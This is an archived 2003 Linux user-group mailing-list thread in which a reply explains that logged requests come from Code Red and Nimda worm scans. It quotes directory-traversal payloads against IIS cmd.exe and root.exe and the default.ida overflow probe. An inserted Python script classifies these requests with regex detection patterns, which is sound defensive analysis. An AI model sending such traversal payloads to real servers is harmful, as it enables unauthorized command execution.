Re: Netwatch 2


Subject: Re: Netwatch 2
From: The Alaskan Bear (akbear@akbearsden.com)
Date: Sun Feb 09 2003 - 00:31:43 AKST


From what I can tell, what you just posted is the same thing I get off of
the logs from my webserver from the Windows machines affected by Code Red and nimbus.
24.237.209.26 - - [01/Feb/2003:23:15:34 -0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:34 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:35 -0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:37 -0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:39 -0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:41 -0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:43 -0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:45 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"

These are just a few examples of the same thing. It looks like your NetBus has some sort of automail on warnings set up.

---
Ted Montgomery 
The Alaskan Bear's Den
akbear@akbearsden.com
Registered Linux User: #253251
907-242-9824

-- There are some things lots of money can buy ... -- -- For everything else, there is LINUX ... --
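The log entries above (and the root.exe / default.ida requests in the quoted message) follow the Apache combined log format, so they can be classified mechanically. The script below is an added example, not from this thread; the sample lines are constructed in the same format, using documentation addresses (192.0.2.10, 198.51.100.7) rather than any real host, and the request signatures are the worm-scan patterns visible in this thread.

```python
import re
from typing import Optional

# Apache combined log format, as in the quoted webserver entries.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request signatures of the Code Red / Nimda scanners seen in the thread.
# Order matters only for the order of tags in the result.
SIGNATURES = {
    # Code Red: the /default.ida buffer-overflow probe (long run of N's).
    "code-red": re.compile(r"^/default\.ida\?", re.I),
    # Nimda: cmd.exe or root.exe reached via directory traversal.
    "nimda": re.compile(r"(cmd|root)\.exe\?/c\+", re.I),
    # Traversal encodings used: plain ../, double-encoded %255c, and the
    # overlong UTF-8 forms %c0%af, %c0%2f and %c1%1c.
    "traversal": re.compile(r"(\.\./|%255c|%c0%af|%c0%2f|%c1%1c)", re.I),
}

# Constructed sample log lines (not real traffic), modelled on the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2003:23:15:34 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"',
    '192.0.2.10 - - [01/Feb/2003:23:15:45 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"',
    '192.0.2.10 - - [01/Feb/2003:23:15:50 -0900] "GET /default.ida?NNNNNNNN%u9090 HTTP/1.0" 404 293 "-" "-"',
    '198.51.100.7 - - [01/Feb/2003:23:16:02 -0900] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

def classify(line: str) -> Optional[dict]:
    """Parse one log line; return fields plus matching signature tags, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    tags = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    # Status is reported but not used: on a non-IIS server these probes
    # simply 404, which is what the thread's logs show.
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": path, "tags": tags}

def summarize(lines) -> dict:
    """Count worm-scan requests per source IP (lines without tags are ignored)."""
    counts: dict = {}
    for line in lines:
        rec = classify(line)
        if rec and rec["tags"]:
            counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    for ip, n in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {n} worm-scan request(s)")
```

Run it against a real access_log with `summarize(open("access_log"))` to see which hosts are still carrying these scanners.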

On Sun, Feb 09, 2003 at 12:01:49AM -0900, Adam Elkins wrote:
>
> Ok, it just happened again. Now that it's there, I can better describe it.
>
> New mail for root@net_slack has arrived:
> ----
> From: Mail Delivery Subsystem
> Subject: Returned mail: see transcript for details
> This is a MIME-encapsulated message
>
> --1h9KGxT09600.1044821819/net_slack..
>
> (at the bottom of the screen; 'NetBus from 192.168.1.42 ' which is my main
> box)
> When I check the mail, it says:
>
> *******************************************************
> WARNING MESSAGE from Netwatch 0.9g at Sun Feb 9
>
> Netbus from 192.168.1.42 to 24.237.63.142 with len=40
> 45 0 0 28 ED 18 0 0 7D 6 36 6A 18
> [I don't feel like typing the rest]
> *******************************************************
>
> The table is 4 lines long, but you get the idea. I did a bit more research,
> and found that Netwatch watches for NetBus/BackOrifice packets.
> The funny thing is, it says it's coming from my other slack box.
> Just out of curiosity, I checked the log for Apache on my other box.
> The IP in the mail was there (24.237.63.142) doing all types of these things:
> "GET /scripts/root.exe?/c+dir HTTP/1.1" 404 293
> There are 9 or so of these, all "GET"ing different things, including this which
> seems very odd:
> "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNN%u909 [i don't feel like typing the rest]
>
>
> I really don't know what all this means. Can someone explain what's
> going on here?
>
> ---------
> To unsubscribe, send email to <aklug-request@aklug.org>
> with 'unsubscribe' in the message body.




This archive was generated by hypermail 2a23 : Sun Feb 09 2003 - 00:32:29 AKST